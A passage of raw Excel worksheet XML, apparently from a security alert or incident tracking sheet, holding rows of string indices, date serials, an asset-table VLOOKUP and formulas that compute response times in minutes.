      <c r="F7" s="10" t="s">
        <v>11577</v>
      </c>
      <c r="G7" s="10"/>
      <c r="H7" s="10"/>
      <c r="I7" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J7" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K7" s="10"/>
      <c r="L7" s="10"/>
      <c r="M7" s="10" t="s">
        <v>11573</v>
      </c>
      <c r="N7" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O7" s="15" t="s">
        <v>8432</v>
      </c>
      <c r="P7" s="10"/>
      <c r="Q7" s="10"/>
      <c r="R7" s="10"/>
      <c r="S7" s="10" t="s">
        <v>8385</v>
      </c>
      <c r="T7" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U7" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V7" s="15" t="s">
        <v>8460</v>
      </c>
      <c r="W7" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X7" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y7" s="10" t="s">
        <v>11420</v>
      </c>
      <c r="Z7" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA7" s="10"/>
      <c r="AB7" s="10"/>
      <c r="AC7" s="14">
        <v>45905.9903819444</v>
      </c>
      <c r="AD7" s="14">
        <v>45905.9875231481</v>
      </c>
      <c r="AE7" s="14"/>
      <c r="AF7" s="14"/>
      <c r="AG7" s="14"/>
      <c r="AH7" s="10"/>
      <c r="AI7" s="10"/>
      <c r="AJ7" s="10"/>
      <c r="AK7" s="10"/>
      <c r="AL7" s="10"/>
      <c r="AM7" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN7" s="10"/>
      <c r="AO7" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP7" s="10"/>
      <c r="AQ7" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR7" s="10"/>
      <c r="AS7" s="10"/>
      <c r="AT7" s="10"/>
      <c r="AU7" s="10"/>
      <c r="AV7" s="10"/>
      <c r="AW7" s="10"/>
      <c r="AX7" s="14"/>
      <c r="AY7" s="1" t="e">
        <f>VLOOKUP(E7,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ7" s="9">
        <f t="shared" si="0"/>
        <v>3.88</v>
      </c>
      <c r="BA7" s="9">
        <f t="shared" si="1"/>
        <v>0.23</v>
      </c>
      <c r="BB7" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC7" s="9">
        <f t="shared" si="3"/>
        <v>0.23</v>
      </c>
      <c r="BD7" s="9">
        <f t="shared" si="4"/>
        <v>0.23</v>
      </c>
    </row>
    <row r="8" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A8" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B8" s="2">
        <v>45943.9592592593</v>
      </c>
      <c r="C8" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D8" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E8" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F8" s="10" t="s">
        <v>11578</v>
      </c>
      <c r="G8" s="10"/>
      <c r="H8" s="10"/>
      <c r="I8" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J8" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K8" s="10"/>
      <c r="L8" s="10"/>
      <c r="M8" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N8" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O8" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P8" s="10"/>
      <c r="Q8" s="10"/>
      <c r="R8" s="10"/>
      <c r="S8" s="10" t="s">
        <v>8663</v>
      </c>
      <c r="T8" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U8" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V8" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W8" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X8" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y8" s="10" t="s">
        <v>11343</v>
      </c>
      <c r="Z8" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA8" s="10"/>
      <c r="AB8" s="10"/>
      <c r="AC8" s="14">
        <v>45943.9897685185</v>
      </c>
      <c r="AD8" s="14">
        <v>45943.9564236111</v>
      </c>
      <c r="AE8" s="14"/>
      <c r="AF8" s="14"/>
      <c r="AG8" s="14"/>
      <c r="AH8" s="10"/>
      <c r="AI8" s="10"/>
      <c r="AJ8" s="10"/>
      <c r="AK8" s="10"/>
      <c r="AL8" s="10"/>
      <c r="AM8" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN8" s="10"/>
      <c r="AO8" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP8" s="10"/>
      <c r="AQ8" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR8" s="10"/>
      <c r="AS8" s="10"/>
      <c r="AT8" s="10"/>
      <c r="AU8" s="10"/>
      <c r="AV8" s="10"/>
      <c r="AW8" s="10"/>
      <c r="AX8" s="14"/>
      <c r="AY8" s="1" t="e">
        <f>VLOOKUP(E8,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ8" s="9">
        <f t="shared" si="0"/>
        <v>4.08</v>
      </c>
      <c r="BA8" s="9">
        <f t="shared" si="1"/>
        <v>43.93</v>
      </c>
      <c r="BB8" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC8" s="9">
        <f t="shared" si="3"/>
        <v>43.93</v>
      </c>
      <c r="BD8" s="9">
        <f t="shared" si="4"/>
        <v>43.93</v>
      </c>
    </row>
    <row r="9" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A9" s="1" t="s">
        <v>289</v>
      </c>
      <c r="B9" s="2">
        <v>45947.364375</v>
      </c>
      <c r="C9" s="10" t="s">
        <v>114</v>
      </c>
      <c r="D9" s="10" t="s">
        <v>8414</v>
      </c>
      <c r="E9" s="10" t="s">
        <v>3612</v>
      </c>
      <c r="F9" s="10" t="s">
        <v>11578</v>
      </c>
      <c r="G9" s="10" t="s">
        <v>11580</v>
      </c>
      <c r="H9" s="10"/>
      <c r="I9" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J9" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K9" s="10"/>
      <c r="L9" s="10"/>
      <c r="M9" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N9" s="10" t="s">
        <v>114</v>
      </c>
      <c r="O9" s="12" t="s">
        <v>8400</v>
      </c>
      <c r="P9" s="10"/>
      <c r="Q9" s="10"/>
      <c r="R9" s="10"/>
      <c r="S9" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T9" s="10" t="s">
        <v>121</v>
      </c>
      <c r="U9" s="10" t="s">
        <v>8389</v>
      </c>
      <c r="V9" s="13" t="s">
        <v>8400</v>
      </c>
      <c r="W9" s="10" t="s">
        <v>8417</v>
      </c>
      <c r="X9" s="10"/>
      <c r="Y9" s="10" t="s">
        <v>10531</v>
      </c>
      <c r="Z9" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA9" s="10"/>
      <c r="AB9" s="10" t="s">
        <v>3612</v>
      </c>
      <c r="AC9" s="14">
        <v>46028.3975810185</v>
      </c>
      <c r="AD9" s="14">
        <v>45947.3634027778</v>
      </c>
      <c r="AE9" s="14">
        <v>45947.3751967593</v>
      </c>
      <c r="AF9" s="14">
        <v>45947.3975810185</v>
      </c>
      <c r="AG9" s="14">
        <v>46028.3975810185</v>
      </c>
      <c r="AH9" s="10"/>
      <c r="AI9" s="10"/>
      <c r="AJ9" s="10"/>
      <c r="AK9" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL9" s="10" t="s">
        <v>8403</v>
      </c>
      <c r="AM9" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN9" s="10"/>
      <c r="AO9" s="10" t="s">
        <v>8549</v>
      </c>
      <c r="AP9" s="10"/>
      <c r="AQ9" s="10" t="s">
        <v>11582</v>
      </c>
      <c r="AR9" s="10"/>
      <c r="AS9" s="10"/>
      <c r="AT9" s="10"/>
      <c r="AU9" s="10"/>
      <c r="AV9" s="10" t="s">
        <v>11583</v>
      </c>
      <c r="AW9" s="10"/>
      <c r="AX9" s="14"/>
      <c r="AY9" s="1" t="str">
        <f>VLOOKUP(E9,资产表!C:AG,31,0)</f>
        <v>外网</v>
      </c>
      <c r="AZ9" s="9">
        <f t="shared" si="0"/>
        <v>1.4</v>
      </c>
      <c r="BA9" s="9">
        <f t="shared" si="1"/>
        <v>15.58</v>
      </c>
      <c r="BB9" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC9" s="9">
        <f t="shared" si="3"/>
        <v>47.82</v>
      </c>
      <c r="BD9" s="9">
        <f t="shared" si="4"/>
        <v>116687.82</v>
      </c>
    </row>
    <row r="10" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A10" s="1" t="s">
        <v>289</v>
      </c>
      <c r="B10" s="2">
        <v>45973.5874768519</v>
      </c>
      <c r="C10" s="10" t="s">
        <v>11584</v>
      </c>
      <c r="D10" s="10" t="s">
        <v>8414</v>
      </c>
      <c r="E10" s="10" t="s">
        <v>2691</v>
      </c>
      <c r="F10" s="10" t="s">
        <v>11585</v>
      </c>
      <c r="G10" s="10" t="s">
        <v>11063</v>
      </c>
      <c r="H10" s="10"/>
      <c r="I10" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J10" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K10" s="10"/>
      <c r="L10" s="10"/>
      <c r="M10" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N10" s="10" t="s">
        <v>114</v>
      </c>
      <c r="O10" s="12" t="s">
        <v>8400</v>
      </c>
      <c r="P10" s="10"/>
      <c r="Q10" s="10"/>
      <c r="R10" s="10"/>
      <c r="S10" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T10" s="10" t="s">
        <v>121</v>
      </c>
      <c r="U10" s="10" t="s">
        <v>11048</v>
      </c>
      <c r="V10" s="13" t="s">
        <v>8432</v>
      </c>
      <c r="W10" s="10"/>
      <c r="X10" s="10"/>
      <c r="Y10" s="10" t="s">
        <v>11062</v>
      </c>
      <c r="Z10" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA10" s="10"/>
      <c r="AB10" s="10" t="s">
        <v>2691</v>
      </c>
      <c r="AC10" s="14">
        <v>46028.3975810185</v>
      </c>
      <c r="AD10" s="14">
        <v>45973.5866319444</v>
      </c>
      <c r="AE10" s="14">
        <v>45973.5906944444</v>
      </c>
      <c r="AF10" s="14">
        <v>45973.6059143519</v>
      </c>
      <c r="AG10" s="14">
        <v>46028.3975810185</v>
      </c>
      <c r="AH10" s="10"/>
      <c r="AI10" s="10"/>
      <c r="AJ10" s="10"/>
      <c r="AK10" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL10" s="10" t="s">
        <v>11061</v>
      </c>
      <c r="AM10" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN10" s="10"/>
      <c r="AO10" s="10" t="s">
        <v>11379</v>
      </c>
      <c r="AP10" s="10"/>
      <c r="AQ10" s="10" t="s">
        <v>11582</v>
      </c>
      <c r="AR10" s="10"/>
      <c r="AS10" s="10"/>
      <c r="AT10" s="10"/>
      <c r="AU10" s="10"/>
      <c r="AV10" s="10" t="s">
        <v>11583</v>
      </c>
      <c r="AW10" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AX10" s="14">
        <v>45973.5906828704</v>
      </c>
      <c r="AY10" s="1" t="str">
        <f>VLOOKUP(E10,资产表!C:AG,31,0)</f>
        <v>外网</v>
      </c>
      <c r="AZ10" s="9">
        <f t="shared" si="0"/>
        <v>1.22</v>
      </c>
      <c r="BA10" s="9">
        <f t="shared" si="1"/>
        <v>4.62</v>
      </c>
      <c r="BB10" s="9">
        <f t="shared" si="2"/>
        <v>4.62</v>
      </c>
      <c r="BC10" s="9">
        <f t="shared" si="3"/>
        <v>26.55</v>
      </c>
      <c r="BD10" s="9">
        <f t="shared" si="4"/>
        <v>78926.55</v>
      </c>
    </row>
    <row r="11" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A11" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B11" s="2">
        <v>46009.7321064815</v>
      </c>
      <c r="C11" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D11" s="10" t="s">
        <v>8544</v>
      </c>
      <c r="E11" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F11" s="10" t="s">
        <v>11574</v>
      </c>
      <c r="G11" s="10"/>
      <c r="H11" s="10"/>
      <c r="I11" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J11" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K11" s="10"/>
      <c r="L11" s="10"/>
      <c r="M11" s="10" t="s">
        <v>11573</v>
      </c>
      <c r="N11" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O11" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P11" s="10"/>
      <c r="Q11" s="10"/>
      <c r="R11" s="10"/>
      <c r="S11" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T11" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U11" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V11" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W11" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X11" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y11" s="10" t="s">
        <v>10691</v>
      </c>
      <c r="Z11" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA11" s="10"/>
      <c r="AB11" s="10"/>
      <c r="AC11" s="14">
        <v>46009.7321064815</v>
      </c>
      <c r="AD11" s="14">
        <v>46009.7296412037</v>
      </c>
      <c r="AE11" s="14"/>
      <c r="AF11" s="14"/>
      <c r="AG11" s="14"/>
      <c r="AH11" s="10"/>
      <c r="AI11" s="10"/>
      <c r="AJ11" s="10"/>
      <c r="AK11" s="10"/>
      <c r="AL11" s="10"/>
      <c r="AM11" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN11" s="10"/>
      <c r="AO11" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP11" s="10"/>
      <c r="AQ11" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR11" s="10"/>
      <c r="AS11" s="10"/>
      <c r="AT11" s="10"/>
      <c r="AU11" s="10"/>
      <c r="AV11" s="10"/>
      <c r="AW11" s="10"/>
      <c r="AX11" s="14"/>
      <c r="AY11" s="1" t="e">
        <f>VLOOKUP(E11,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ11" s="9">
        <f t="shared" si="0"/>
        <v>3.55</v>
      </c>
      <c r="BA11" s="9">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="BB11" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC11" s="9">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BD11" s="9">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="12" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A12" s="1" t="s">
        <v>289</v>
      </c>
      <c r="B12" s="2">
        <v>46028.4049421296</v>
      </c>
      <c r="C12" s="10" t="s">
        <v>11584</v>
      </c>
      <c r="D12" s="10" t="s">
        <v>8414</v>
      </c>
      <c r="E12" s="10" t="s">
        <v>3612</v>
      </c>
      <c r="F12" s="10" t="s">
        <v>11578</v>
      </c>
      <c r="G12" s="10" t="s">
        <v>11587</v>
      </c>
      <c r="H12" s="10"/>
      <c r="I12" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J12" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K12" s="10"/>
      <c r="L12" s="10"/>
      <c r="M12" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N12" s="10" t="s">
        <v>114</v>
      </c>
      <c r="O12" s="12" t="s">
        <v>8400</v>
      </c>
      <c r="P12" s="10"/>
      <c r="Q12" s="10"/>
      <c r="R12" s="10"/>
      <c r="S12" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="T12" s="10" t="s">
        <v>121</v>
      </c>
      <c r="U12" s="10" t="s">
        <v>8389</v>
      </c>
      <c r="V12" s="13" t="s">
        <v>8400</v>
      </c>
      <c r="W12" s="10" t="s">
        <v>8417</v>
      </c>
      <c r="X12" s="10"/>
      <c r="Y12" s="10" t="s">
        <v>10442</v>
      </c>
      <c r="Z12" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA12" s="10"/>
      <c r="AB12" s="10" t="s">
        <v>3612</v>
      </c>
      <c r="AC12" s="14">
        <v>46038.4662037037</v>
      </c>
      <c r="AD12" s="14">
        <v>46028.404224537</v>
      </c>
      <c r="AE12" s="14">
        <v>46028.4072569444</v>
      </c>
      <c r="AF12" s="14">
        <v>46028.424537037</v>
      </c>
      <c r="AG12" s="14">
        <v>46038.4662037037</v>
      </c>
      <c r="AH12" s="10"/>
      <c r="AI12" s="10"/>
      <c r="AJ12" s="10"/>
      <c r="AK12" s="10" t="s">
        <v>11581</v>
      </c>
      <c r="AL12" s="10" t="s">
        <v>8403</v>
      </c>
      <c r="AM12" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN12" s="10"/>
      <c r="AO12" s="10" t="s">
        <v>8549</v>
      </c>
      <c r="AP12" s="10"/>
      <c r="AQ12" s="10" t="s">
        <v>11588</v>
      </c>
      <c r="AR12" s="10"/>
      <c r="AS12" s="10"/>
      <c r="AT12" s="10"/>
      <c r="AU12" s="10"/>
      <c r="AV12" s="10" t="s">
        <v>11589</v>
      </c>
      <c r="AW12" s="10" t="s">
        <v>11586</v>
      </c>
      <c r="AX12" s="14">
        <v>46028.4062962963</v>
      </c>
      <c r="AY12" s="1" t="str">
        <f>VLOOKUP(E12,资产表!C:AG,31,0)</f>
        <v>外网</v>
      </c>
      <c r="AZ12" s="9">
        <f t="shared" si="0"/>
        <v>1.03</v>
      </c>
      <c r="BA12" s="9">
        <f t="shared" si="1"/>
        <v>1.95</v>
      </c>
      <c r="BB12" s="9">
        <f t="shared" si="2"/>
        <v>1.95</v>
      </c>
      <c r="BC12" s="9">
        <f t="shared" si="3"/>
        <v>28.22</v>
      </c>
      <c r="BD12" s="9">
        <f t="shared" si="4"/>
        <v>14488.22</v>
      </c>
    </row>
    <row r="13" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A13" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B13" s="2">
        <v>46049.8499768519</v>
      </c>
      <c r="C13" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D13" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E13" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F13" s="10" t="s">
        <v>11590</v>
      </c>
      <c r="G13" s="10"/>
      <c r="H13" s="10"/>
      <c r="I13" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J13" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K13" s="10"/>
      <c r="L13" s="10"/>
      <c r="M13" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N13" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O13" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P13" s="10"/>
      <c r="Q13" s="10"/>
      <c r="R13" s="10"/>
      <c r="S13" s="10" t="s">
        <v>8424</v>
      </c>
      <c r="T13" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U13" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V13" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W13" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X13" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y13" s="10" t="s">
        <v>10417</v>
      </c>
      <c r="Z13" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA13" s="10"/>
      <c r="AB13" s="10"/>
      <c r="AC13" s="14">
        <v>46049.8709375</v>
      </c>
      <c r="AD13" s="14">
        <v>46049.8509722222</v>
      </c>
      <c r="AE13" s="14"/>
      <c r="AF13" s="14"/>
      <c r="AG13" s="14"/>
      <c r="AH13" s="10"/>
      <c r="AI13" s="10"/>
      <c r="AJ13" s="10"/>
      <c r="AK13" s="10"/>
      <c r="AL13" s="10"/>
      <c r="AM13" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN13" s="10"/>
      <c r="AO13" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP13" s="10"/>
      <c r="AQ13" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR13" s="10"/>
      <c r="AS13" s="10"/>
      <c r="AT13" s="10"/>
      <c r="AU13" s="10"/>
      <c r="AV13" s="10"/>
      <c r="AW13" s="10"/>
      <c r="AX13" s="14"/>
      <c r="AY13" s="1" t="e">
        <f>VLOOKUP(E13,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ13" s="9">
        <f t="shared" si="0"/>
        <v>-1.43</v>
      </c>
      <c r="BA13" s="9">
        <f t="shared" ref="BA13:BA44" si="5">IF(A13&lt;&gt;"最新威胁",IF(ISBLANK(AX13),IF(ISBLANK(AE13),ROUND((AC13-B13)*24*60,2),ROUND((AE13-B13)*24*60,2)),ROUND((AX13-B13)*24*60,2)),"")</f>
        <v>30.18</v>
      </c>
      <c r="BB13" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC13" s="9">
        <f t="shared" si="3"/>
        <v>30.18</v>
      </c>
      <c r="BD13" s="9">
        <f t="shared" si="4"/>
        <v>30.18</v>
      </c>
    </row>
    <row r="14" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A14" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B14" s="2">
        <v>46049.8678009259</v>
      </c>
      <c r="C14" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D14" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E14" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F14" s="10" t="s">
        <v>11591</v>
      </c>
      <c r="G14" s="10"/>
      <c r="H14" s="10"/>
      <c r="I14" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J14" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K14" s="10"/>
      <c r="L14" s="10"/>
      <c r="M14" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N14" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O14" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P14" s="10"/>
      <c r="Q14" s="10"/>
      <c r="R14" s="10"/>
      <c r="S14" s="10" t="s">
        <v>8424</v>
      </c>
      <c r="T14" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U14" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V14" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W14" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X14" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y14" s="10" t="s">
        <v>10426</v>
      </c>
      <c r="Z14" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA14" s="10"/>
      <c r="AB14" s="10"/>
      <c r="AC14" s="14">
        <v>46049.8744328704</v>
      </c>
      <c r="AD14" s="14">
        <v>46049.8460069444</v>
      </c>
      <c r="AE14" s="14"/>
      <c r="AF14" s="14"/>
      <c r="AG14" s="14"/>
      <c r="AH14" s="10"/>
      <c r="AI14" s="10"/>
      <c r="AJ14" s="10"/>
      <c r="AK14" s="10"/>
      <c r="AL14" s="10"/>
      <c r="AM14" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN14" s="10"/>
      <c r="AO14" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP14" s="10"/>
      <c r="AQ14" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR14" s="10"/>
      <c r="AS14" s="10"/>
      <c r="AT14" s="10"/>
      <c r="AU14" s="10"/>
      <c r="AV14" s="10"/>
      <c r="AW14" s="10"/>
      <c r="AX14" s="14"/>
      <c r="AY14" s="1" t="e">
        <f>VLOOKUP(E14,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ14" s="9">
        <f t="shared" si="0"/>
        <v>31.38</v>
      </c>
      <c r="BA14" s="9">
        <f t="shared" si="5"/>
        <v>9.55</v>
      </c>
      <c r="BB14" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC14" s="9">
        <f t="shared" si="3"/>
        <v>9.55</v>
      </c>
      <c r="BD14" s="9">
        <f t="shared" si="4"/>
        <v>9.55</v>
      </c>
    </row>
    <row r="15" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A15" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B15" s="2">
        <v>46049.8688078704</v>
      </c>
      <c r="C15" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D15" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E15" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F15" s="10" t="s">
        <v>11585</v>
      </c>
      <c r="G15" s="10"/>
      <c r="H15" s="10"/>
      <c r="I15" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J15" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K15" s="10"/>
      <c r="L15" s="10"/>
      <c r="M15" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N15" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O15" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P15" s="10"/>
      <c r="Q15" s="10"/>
      <c r="R15" s="10"/>
      <c r="S15" s="10" t="s">
        <v>8805</v>
      </c>
      <c r="T15" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U15" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V15" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W15" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X15" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y15" s="10" t="s">
        <v>10423</v>
      </c>
      <c r="Z15" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA15" s="10"/>
      <c r="AB15" s="10"/>
      <c r="AC15" s="14">
        <v>46049.8733912037</v>
      </c>
      <c r="AD15" s="14">
        <v>46049.8509722222</v>
      </c>
      <c r="AE15" s="14"/>
      <c r="AF15" s="14"/>
      <c r="AG15" s="14"/>
      <c r="AH15" s="10"/>
      <c r="AI15" s="10"/>
      <c r="AJ15" s="10"/>
      <c r="AK15" s="10"/>
      <c r="AL15" s="10"/>
      <c r="AM15" s="10" t="s">
        <v>8390</v>
      </c>
      <c r="AN15" s="10"/>
      <c r="AO15" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="AP15" s="10"/>
      <c r="AQ15" s="10" t="s">
        <v>11571</v>
      </c>
      <c r="AR15" s="10"/>
      <c r="AS15" s="10"/>
      <c r="AT15" s="10"/>
      <c r="AU15" s="10"/>
      <c r="AV15" s="10"/>
      <c r="AW15" s="10"/>
      <c r="AX15" s="14"/>
      <c r="AY15" s="1" t="e">
        <f>VLOOKUP(E15,资产表!C:AG,31,0)</f>
        <v>#N/A</v>
      </c>
      <c r="AZ15" s="9">
        <f t="shared" si="0"/>
        <v>25.68</v>
      </c>
      <c r="BA15" s="9">
        <f t="shared" si="5"/>
        <v>6.6</v>
      </c>
      <c r="BB15" s="9" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="BC15" s="9">
        <f t="shared" si="3"/>
        <v>6.6</v>
      </c>
      <c r="BD15" s="9">
        <f t="shared" si="4"/>
        <v>6.6</v>
      </c>
    </row>
    <row r="16" s="1" customFormat="1" hidden="1" spans="1:56">
      <c r="A16" s="1" t="s">
        <v>11566</v>
      </c>
      <c r="B16" s="2">
        <v>46049.869212963</v>
      </c>
      <c r="C16" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="D16" s="10" t="s">
        <v>8626</v>
      </c>
      <c r="E16" s="10" t="s">
        <v>8551</v>
      </c>
      <c r="F16" s="10" t="s">
        <v>11578</v>
      </c>
      <c r="G16" s="10"/>
      <c r="H16" s="10"/>
      <c r="I16" s="11" t="s">
        <v>11568</v>
      </c>
      <c r="J16" s="10" t="s">
        <v>8381</v>
      </c>
      <c r="K16" s="10"/>
      <c r="L16" s="10"/>
      <c r="M16" s="10" t="s">
        <v>11579</v>
      </c>
      <c r="N16" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="O16" s="12" t="s">
        <v>8432</v>
      </c>
      <c r="P16" s="10"/>
      <c r="Q16" s="10"/>
      <c r="R16" s="10"/>
      <c r="S16" s="10" t="s">
        <v>8424</v>
      </c>
      <c r="T16" s="10" t="s">
        <v>8460</v>
      </c>
      <c r="U16" s="10" t="s">
        <v>8553</v>
      </c>
      <c r="V16" s="13" t="s">
        <v>8460</v>
      </c>
      <c r="W16" s="10" t="s">
        <v>8548</v>
      </c>
      <c r="X16" s="10" t="s">
        <v>11570</v>
      </c>
      <c r="Y16" s="10" t="s">
        <v>10420</v>
      </c>
      <c r="Z16" s="10" t="s">
        <v>8388</v>
      </c>
      <c r="AA16" s="10"/>
      <c r="AB16" s="10"/>
      <c r="AC16" s="14">
        <v>46049.878599537</v>
      </c>
      <c r="AD16" s="14">
        <v>46049.8509375</v>
      </c>
      <c r="AE16" s="14"/>
      <c r="AF16" s="14"/>
      <c r="AG16" s="14"/>
      <c r="AH16" s="10"/>
      <c r="AI16" s="10"/>
      <c r="AJ16" s="10"/>
      <c r="AK16" s="10"/>
      <c r="AL16" s="10"/>
      <c r="AM16" s="10" t="s">
        <v>8390</v>
